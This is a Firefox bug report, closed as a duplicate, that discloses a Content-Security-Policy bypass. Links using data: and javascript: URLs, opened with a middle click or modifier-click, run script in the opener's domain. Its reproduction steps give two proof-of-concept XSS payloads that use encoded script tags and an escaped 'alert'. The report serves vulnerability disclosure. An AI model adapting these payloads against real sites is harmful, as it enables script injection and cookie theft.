Closed Bug 1370792 Opened 7 years ago Closed 7 years ago

CSP bypass for new window opened with middle mouse

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
53 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1296976

People

(Reporter: public, Unassigned)

Details

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Steps to reproduce:

Content-Security-Policy: default-src 'none'

<a href="data:text/html,%3cscript%3e\u0061lert(document.domain)%3c/script%3e">data:</a>
<a href="javascript:'%3cscript%3e\u0061lert(document.domain)%3c/script%3e'">javascript:</a>

Press middle mouse button or CMD/CTRL/Shift + left click


Actual results:

New tab with alert message with opener domain, with access to cookie etc.


Expected results:

Chrome - Open and close new tab/CSP Error
Edge - Error page/CSP Error
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → DUPLICATE
Thank you for reporting this, Roman.
Please send email to security@mozilla.org instead of me personally.
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.